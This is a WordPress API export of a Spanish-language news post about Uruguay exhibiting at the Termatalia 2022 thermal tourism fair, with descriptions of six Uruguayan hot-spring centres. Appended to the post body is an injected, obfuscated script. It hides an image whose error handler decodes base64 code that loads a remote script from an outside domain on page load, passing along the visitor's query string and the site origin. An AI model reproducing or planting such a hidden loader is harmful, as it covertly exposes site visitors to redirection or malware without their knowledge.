{"id":5729,"date":"2022-08-31T12:02:36","date_gmt":"2022-08-31T15:02:36","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=5729"},"modified":"2025-08-13T16:13:58","modified_gmt":"2025-08-13T19:13:58","slug":"uruguay-refuerza-su-participacion-en-termatalia-2022-2","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=5729","title":{"rendered":"Uruguay refuerza su participaci\u00f3n en Termatalia 2022"},"content":{"rendered":"\n<h3 class=\"has-vivid-cyan-blue-color has-text-color wp-block-heading\">Confirma su participaci\u00f3n como pa\u00eds ampliando su presencia como expositor<\/h3>\n\n\n\n<p><strong>El viceministro de Turismo de este pa\u00eds, Remo Monzeglio, encabezar\u00e1 una delegaci\u00f3n de representantes institucionales y empresariales que participar\u00e1 en las distintas acciones profesionales de la feria<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.termatalia.com\/wp-content\/uploads\/Termas-Dayman-1536x1024.jpg.webp\" alt=\"\" \/><\/figure>\n\n\n\n<p>La Rep\u00fablica del Uruguay confirma su presencia como expositor en Termatalia 2022, la Feria Internacional de Turismo Termal, Salud y Bienestar, que se celebra en Ourense (Espa\u00f1a) los d\u00edas 29 y 30 de septiembre. En esta edici\u00f3n el pa\u00eds se posiciona como uno de los principales destinos termales de Am\u00e9rica Latina y tendr\u00e1 una participaci\u00f3n activa en la feria. Adem\u00e1s de aumentar la superficie expositiva, conviene destacar la presencia de una delegaci\u00f3n de profesionales del pa\u00eds que estar\u00e1 encabezada por el propio viceministro de Turismo de la Rep\u00fablica, Remo Monzeglio.<\/p>\n\n\n\n<p>La participaci\u00f3n del Uruguay en Termatalia 2022 se completar\u00e1 con la presentaci\u00f3n, dentro de las Jornadas T\u00e9cnicas Profesionales de esta edici\u00f3n, \u00abUruguay Termal el a\u00f1o entero\u00bb a cargo del propio viceministro Monzeglio, profesional con larga trayectoria en el sector hotelero y tur\u00edstico ya que, entre otros cargos, fue el primer Presidente de la Asociaci\u00f3n de Gerentes de Hoteles de Am\u00e9rica Latina AGHAL, adem\u00e1s de Presidente de la C\u00e1mara de la Industria Tur\u00edstica Hotelera del Uruguay CIHTU y miembro honorario de la Asociaci\u00f3n Espa\u00f1ola de Directores de Hotel, AEDH.<\/p>\n\n\n\n<p>Aunque Uruguay ha participado en numerosas ediciones en Termatalia representada por su Consulado en Galicia, fue en 2018 la primera vez que particip\u00f3 como marca pa\u00eds, estando directamente representado por el Ministerio de Turismo de la Rep\u00fablica del Uruguay.<\/p>\n\n\n\n<p>Desde entonces, han permanecido vinculados al proyecto Termatalia y han participado en las distintas acciones profesionales que la feria ha organizado durante los a\u00f1os de la pandemia como lo manifest\u00f3 la participaci\u00f3n del pa\u00eds en el Congreso Internacional sobre Agua y Salud celebrado en septiembre de 2021. En este evento que fue seguido por m\u00e1s de 500 profesionales de 30 pa\u00edses, Uruguay se present\u00f3 como \u201cDestino Termas Uruguay\u201d a cargo de Andrea Malvasio por Intendencia de Salto y Jos\u00e9 Manuel Galv\u00e1n por Intendencia de Paysand\u00fa. Ambos son los directores de las \u00c1reas de Turismo de los Departamentos Destino Termas.<\/p>\n\n\n\n<p><strong>Uruguay, destino termal<\/strong><\/p>\n\n\n\n<p>Situada en la zona noroeste de Uruguay, a 400 km de Montevideo, en los departamentos de Salto y Paysand\u00fa, se encuentra una amplia zona de oferta termal, que constituye un verdadero regalo de la naturaleza. El agua de las termas surge del Sistema Acu\u00edfero Guaran\u00ed, que es el m\u00e1s grande de Am\u00e9rica del Sur, y constituye uno de los recursos h\u00eddricos subterr\u00e1neos m\u00e1s importantes del planeta, debido a sus dimensiones, y a la calidad y a la temperatura de las aguas.<\/p>\n\n\n\n<p>En Uruguay este gran parque de agua tiene temperaturas que oscilan entre los 38\u00b0 C y los 46\u00b0 C. En la regi\u00f3n el turista encuentra m\u00faltiples maneras de aprovechar este recurso; piscinas de todos los tama\u00f1os, formas y temperatura de agua, duchas de relax, chorros tonificantes y ba\u00f1os de burbujas son una tentaci\u00f3n para el descanso y bienestar, dejando atr\u00e1s el estr\u00e9s.<br>En contacto y comunicaci\u00f3n con la naturaleza, las termas est\u00e1n rodeadas de suaves y onduladas praderas naturales surcadas por el agua de r\u00edos y arroyos. Los paisajes son maravillosos y para llegar a algunos Centros Termales hay que desviarse de la ruta por caminos que conducen hacia lugares de ensue\u00f1o. Para los que buscan un acercamiento a\u00fan m\u00e1s directo con la naturaleza, as\u00ed como con las costumbres del medio rural, hay estancias tur\u00edsticas donde se puede participar de las actividades diarias de campo, como orde\u00f1e, rodeos y esquila.<\/p>\n\n\n\n<p>Existen seis centros termales: Arapey, Daym\u00e1n, Guaviy\u00fa, Salto Grande, Almir\u00f3n y San Nicanor.<\/p>\n\n\n\n<p>TERMAS DEL ARAPEY: \u00a1Primer complejo termal del Uruguay! Ubicado en Salto sobre el r\u00edo que da origen a su nombre. Con piscinas abiertas, techadas y semicubiertas rodeadas de jardines y frondosos espacios verdes. Propone una amplia oferta de alojamientos: bungalows, moteles y hoteler\u00eda con sistema All Inclusive.<br>El acceso est\u00e1 habilitado \u00fanicamente para quienes opten alojarse en el centro termal.<\/p>\n\n\n\n<p>TERMAS DEL DAYM\u00c1N: Ubicadas en Salto sobre el r\u00edo que da origen a su nombre ofrece variada propuesta hotelera, spa y piscinas termales privadas y un parque acu\u00e1tico de juegos. El \u00e1rea municipal cuenta con piscinas de temperaturas reguladas para cada estaci\u00f3n en un hermoso y cuidado entorno natural.<br>TERMAS DEL GUAVIY\u00da: Ubicadas en Paysand\u00fa sobre el arroyo que da origen a su nombre. Sus piscinas abiertas y cubiertas, son condimentadas por un entorno agreste y ex\u00f3tico de palmeras Yatay. Las opciones de alojamiento contemplan camping, moteles municipales, caba\u00f1as y propuestas privadas.<br>TERMAS DEL SALTO GRANDE: A solo 13km de ciudad de Salto, con m\u00e1s de 8 atracciones \u00fanicas para que toda la familia pase un d\u00eda inolvidable!<br>TERMAS ALMIR\u00d3N: Ubicadas en Paysand\u00fa, poseen un particular diferencial, son las \u00fanicas termas de agua salada en la regi\u00f3n con destacadas propiedades. El \u00e1rea municipal tiene piscinas de agua salada y agua dulce, bungalows, caba\u00f1as y camping. Tambi\u00e9n integran la oferta emprendimientos privados de peque\u00f1o y gran porte.<br>TERMAS SAN NICANOR: El complejo est\u00e1 situado en el departamento de Paysand\u00fa, a unos 20 km de Salto ya 10 km de las Termas del Dayman. Rodeado de campos verdes y con cuatro lagos que le dan al lugar un toque m\u00e1s natural, tienes la oportunidad de ir a pescar.<\/p>\n\n\n\n<p>M\u00e1s informaci\u00f3n en:&nbsp;<a href=\"https:\/\/destinotermas.gub.uy\/\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/destinotermas.gub.uy\/<\/a>&nbsp;<a href=\"http:\/\/uruguaynatural.com\/\" target=\"_blank\" rel=\"noreferrer noopener\">http:\/\/uruguaynatural.com\/<\/a><\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/guaviyu1-1536x1028.jpg.webp\"><img decoding=\"async\" width=\"1024\" height=\"685\" data-id=\"5730\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/guaviyu1-1536x1028.jpg-1024x685.webp\" alt=\"\" class=\"wp-image-5730\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/guaviyu1-1536x1028.jpg-1024x685.webp 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/guaviyu1-1536x1028.jpg-300x201.webp 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/guaviyu1-1536x1028.jpg-768x514.webp 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/guaviyu1-1536x1028.jpg-696x466.webp 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/guaviyu1-1536x1028.jpg-1068x715.webp 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/guaviyu1-1536x1028.jpg-628x420.webp 628w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/guaviyu1-1536x1028.jpg-320x214.webp 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/guaviyu1-1536x1028.jpg-480x321.webp 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/guaviyu1-1536x1028.jpg-800x535.webp 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/guaviyu1-1536x1028.jpg.webp 1536w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Termas-Arapey2.jpg.webp\"><img decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"5731\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Termas-Arapey2.jpg.webp\" alt=\"\" class=\"wp-image-5731\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Termas-Arapey2.jpg.webp 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Termas-Arapey2.jpg-300x200.webp 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Termas-Arapey2.jpg-768x512.webp 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Termas-Arapey2.jpg-696x464.webp 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Termas-Arapey2.jpg-631x420.webp 631w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Termas-Arapey2.jpg-320x213.webp 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Termas-Arapey2.jpg-480x320.webp 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Termas-Arapey2.jpg-800x533.webp 800w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Termas-Dayman-1536x1024.jpg.webp\"><img decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"5732\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Termas-Dayman-1536x1024.jpg-1024x683.webp\" alt=\"\" class=\"wp-image-5732\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Termas-Dayman-1536x1024.jpg-1024x683.webp 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Termas-Dayman-1536x1024.jpg-300x200.webp 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Termas-Dayman-1536x1024.jpg-768x512.webp 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Termas-Dayman-1536x1024.jpg-696x464.webp 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Termas-Dayman-1536x1024.jpg-1068x712.webp 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Termas-Dayman-1536x1024.jpg-630x420.webp 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Termas-Dayman-1536x1024.jpg-320x213.webp 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Termas-Dayman-1536x1024.jpg-480x320.webp 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Termas-Dayman-1536x1024.jpg-800x533.webp 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Termas-Dayman-1536x1024.jpg.webp 1536w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/figure>\n\n\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Confirma su participaci\u00f3n como pa\u00eds ampliando su presencia como expositor El viceministro de Turismo de este pa\u00eds, Remo Monzeglio, encabezar\u00e1 una delegaci\u00f3n de representantes institucionales y empresariales que participar\u00e1 en las distintas acciones profesionales de la feria La Rep\u00fablica del Uruguay confirma su presencia como expositor en Termatalia 2022, la Feria Internacional de Turismo Termal, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":5732,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[12],"tags":[],"class_list":["post-5729","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-internacionales"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5729","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5729"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5729\/revisions"}],"predecessor-version":[{"id":10593,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5729\/revisions\/10593"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5732"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5729"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5729"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5729"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}